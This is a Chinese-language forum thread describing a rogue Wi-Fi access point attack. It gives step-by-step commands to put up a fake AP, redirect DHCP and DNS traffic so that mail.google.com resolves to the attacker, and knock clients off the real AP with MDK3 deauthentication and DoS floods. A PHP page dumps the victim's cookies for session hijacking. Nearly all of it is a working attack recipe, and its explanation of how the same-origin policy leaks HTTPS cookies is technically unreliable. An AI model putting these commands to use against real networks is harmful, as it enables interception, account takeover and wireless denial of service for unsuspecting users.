无线安全: 通过伪AP进行DHCP+DNS劫持的钓鱼攻击

只看该作者 · 2019-9-7 17:37

0x5: XSS中的同源策略

我们已经将用户访问mail.google.com的流量劫持到了我们的钓鱼页面

客户端连接上我们的伪AP后，访问mail.google.com，DNS服务器会返回10.0.0.1的IP地址，即会被劫持到我们的钓鱼页面，而在我们的钓鱼页面，我们就可以使用XSS攻击来获取目标客户端的Cookie信息，因为目标客户端的浏览器访问的是https://mail.google.com，所以根据同源策略，浏览器会把和mail.google.com这个域有关的cookie一起发送给服务器端(也就是我们的10.0.0.1机器)，这样，就利用同源策略帮助我们偷取客户端的cookie。

因为是GMAIL是https连接，所以我们的钓鱼页面也是https连接，我们需要对我们的钓鱼页面所在的apache配置一下SSL
http://man.ddvip.com/linux/debian/apache2/debian-apache2-7.html

只看该作者 · 2019-9-7 17:38

为了说明原理，我们的钓鱼页面可以这样简单的code一下

复制

<?php     

    echo "Your are Hacked By LittleHann" . "</br>";

    $cookie = $_COOKIE; 

    foreach ($cookie as $key => $value) 

    {

        $res .= $key . "=" . $value . ";";

    } 

    echo $res;

?>

可以看到，劫持前，用户正在正常的访问GMAIL邮箱

我们启动伪AP、伪DHCP、伪DNS模块后，将用户的gmail流量劫持到了我们的钓鱼页面上，并打印出cookie

获取cookie成功，接下来就可以进行XSS攻击了，直接用cookie免登录

只看该作者 · 2019-9-7 17:38

0x5: Deauth/DOS拒绝服务攻击

至此，我们已经理清了一个伪AP钓鱼劫持的攻击过程中涉及到的技术，但是，还有最后一个技术问题需要我们解决，我们创建的伪AP需要目标用户的"主动连接"，才能劫持流量，进行DNS钓鱼。但是，在真实场景中，用户一般不会去连接一个不熟悉的AP的，所以，我们还需要一种技术，能将用户和原始AP的连接强制断开，强制它连接到我们的伪AP上，而且要保证这个过程不引起用户的察觉

只看该作者 · 2019-9-7 17:39

这里我们使用无线DOS工具MDK3，它能够发起如下攻击:

1. Beacon Flood Mode
我们知道，Beacon(管理帧)是AP发出来的，用来通知客户端当前AP的存在，这个模式可以产生大量死亡SSID(永远不会有响应的SSID)来充斥无线客户端的无线列表，从而扰乱无线使用者
mdk3 mon0 b -f /pentest/passwords/wordlists/rockyou.txt -t -c 1 -s 80

2. Authentication DoS
Authentication(管理帧)是客户端和AP进行身份认证时发送的数据帧。这是一种验证请求攻击模式：在这个模式里，软件自动模拟随机产生的mac向目标AP发起大量验证请求，可以导致AP忙于处
理过多的请求而停止对正常连接客户端的响应
mdk3 mon0 a -a 74:25:8a:47:3b:70 -s 80
(74:25:8a:47:3b:70是你的目标AP)

3. Basic probing and ESSID Bruteforce mode
基本探测AP信息和ESSID猜解模式
mdk3 mon0 p -b a -t 74:25:8a:47:3b:70 -s 100

4. Deauthentication/Disassociation Amok
Deauthentication/Disassociation(管理帧)是客户端和AP之间进行wireless断开连接通信的数据帧，即强制解除验证解除连接，在这个模式下，软件会向周围所有可见AP发起循环攻击
(有黑、白名单对攻击范围进行控制)
mdk3 mon0 d -s 120 -c 1,6,11
(这种攻击的强制断线效果比使用aireplay-ng来发送deauth攻击效果要好)

只看该作者 · 2019-9-7 17:39

3. 攻击重现实验

至此，我们已经解决了这个攻击姿势中所涉及到的所有技术难点，我们来从头梳理、重现一遍这整个攻击过程

开启无线网卡的Monitor模式

ifconfig -a
ifconfig wlan1 up
airmon-ng start wlan1

只看该作者 · 2019-9-7 17:39

探测目标客户端所连接的AP，为伪AP的架设作准备

airodump-ng mon0

只看该作者 · 2019-9-7 17:40

我们了解到以下信息

1. SSID(WiFi名称): AirJ
2. 加密方式: OPEN
3. 信道: 1

只看该作者 · 2019-9-7 17:40

启动伪AP

airbase-ng mon0 -e "AirJ" -c 1

只看该作者 · 2019-9-7 17:40

启动DHCP

ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1500
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1

/etc/init.d/dhcp3-server start

只看该作者 · 2019-9-7 17:41

Iptables流量牵引

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -s 10.0.0.0/24 -o eth0 -j SNAT --to-source 192.168.159.254
iptables -t nat -A PREROUTING -d 192.168.159.254 -i eth0 -j DNAT --to 10.0.0.100

只看该作者 · 2019-9-7 17:41

启动DNS

msfconsole
use auxiliary/server/fakedns
show options
set TARGETACTION FAKE
set TARGETDOMAIN mail.google.com
set TARGETHOST 10.0.0.1
run

只看该作者 · 2019-9-7 17:41

使用MDK将客户端强制踢下线，迫使其连接到我们的伪AP上

mdk3 mon0 d -s 120 -c 1,6,11

只看该作者 · 2019-9-7 17:42

劫持成功

等待客户端访问GMAIL，对其发送DNS+XSS钓鱼攻击

成功获取到客户端的cookie数据

只看该作者 · 2019-9-7 17:42

4. 后记

除了使用DNS+XSS钓鱼攻击之外，基于伪AP的攻击还可以是SSL中间人劫持方向的

http://www.freebuf.com/articles/web/5636.html
http://www.freebuf.com/tools/10530.html
http://www.freebuf.com/articles/web/5929.html
http://www.freebuf.com/articles/network/29288.html